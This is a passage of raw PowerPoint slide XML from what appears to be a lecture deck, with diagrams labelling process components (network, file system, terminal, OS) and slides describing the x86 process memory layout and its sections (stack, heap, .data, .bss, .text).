              <a:gd name="connsiteY1" fmla="*/ 1563945 h 1563945"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1574290"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1563945"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1574290" h="1563945">
                <a:moveTo>
                  <a:pt x="1574290" y="1553448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="713678" y="1563945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>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6" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2577643" y="3105159"/>
            <a:ext cx="889987"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Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325492" y="4731909"/>
            <a:ext cx="1274708" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5171791" y="2246556"/>
            <a:ext cx="1390124"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Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5434685" y="4766535"/>
            <a:ext cx="864339" cy="646331"/>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File </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7655428" y="4407559"/>
            <a:ext cx="1015150"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Terminal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200020" y="3105159"/>
            <a:ext cx="1312679"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Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2079178" y="4558785"/>
            <a:ext cx="477602"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OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7769498" y="4743451"/>
            <a:ext cx="774883" cy="891316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70729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7" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="5" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="23" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="3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Memory Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4130215" y="3375621"/>
            <a:ext cx="2331843" cy="2146091"/>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3GB Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4130215" y="2565357"/>
            <a:ext cx="2331843" cy="81026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1GB Kernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5020450" y="2074112"/>
            <a:ext cx="530915" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681943" y="5249450"/>
            <a:ext cx="1338828" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2941180" y="2552040"/>
            <a:ext cx="1189035" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0xffffffffff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042507" y="3375620"/>
            <a:ext cx="1044517" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0xbfffffff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2690960" y="3061035"/>
            <a:ext cx="1326004" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0xc0000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33768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p:bldP spid="11" grpId="0"/>
      <p:bldP spid="12" grpId="0"/>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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Process Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985091" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Environment/Argument section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for environment data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for the command line data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for local parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for saving the processor status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory-mapping segment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for shared libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for dynamically allocated data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data section (Static/global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initialized variables (.data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uninitialized variables (.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code/Text section (.text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Marked read-only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modifications causes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>segfaults</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985092" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="549526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Code (.text)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985093" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="520951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Data (.data)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985094" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3175086"/>
            <a:ext cx="2590800" cy="507121"/>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endParaRPr lang="it-IT" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985095" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5105400" y="2317834"/>
            <a:ext cx="0" cy="342900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sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985096" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7848600" y="2317834"/>
            <a:ext cx="0" cy="342900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sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985097" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3175085"/>
            <a:ext cx="2590800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985098" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5813970" y="3290461"/>
            <a:ext cx="3175" cy="3429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400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985099" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5095324" y="5724937"/>
            <a:ext cx="2278188" cy="276999"/>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it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Bottom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (0x00800000)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985100" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5103181" y="2063920"/>
            <a:ext cx="2134495" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (0xBFFFFFFF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985101" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="4342640"/>
            <a:ext cx="2590800" cy="181071"/>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endParaRPr lang="it-IT" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985102" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="4523711"/>
            <a:ext cx="2590800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6B9B8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985103" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7010402" y="4430232"/>
            <a:ext cx="3175" cy="3429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400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985104" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2317835"/>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Env/Argv Strings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985105" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2603584"/>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Env/Argv Pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985106" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2889335"/>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Argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985107" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="492376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Data (.bss)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985108" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3919537"/>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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> Libraries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41766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5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50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50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51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8509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850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8509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8510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8510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8510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85091">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85091">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85091">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8509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8509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8509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85091">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985091">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8510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985091">
                                            <p:txEl>
                                              <p:pRg st="8" end="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985091">
                                            <p:txEl>
                                              <p:pRg st="9" end="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8510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8510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8510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985091">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>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985091">
                                            <p:txEl>
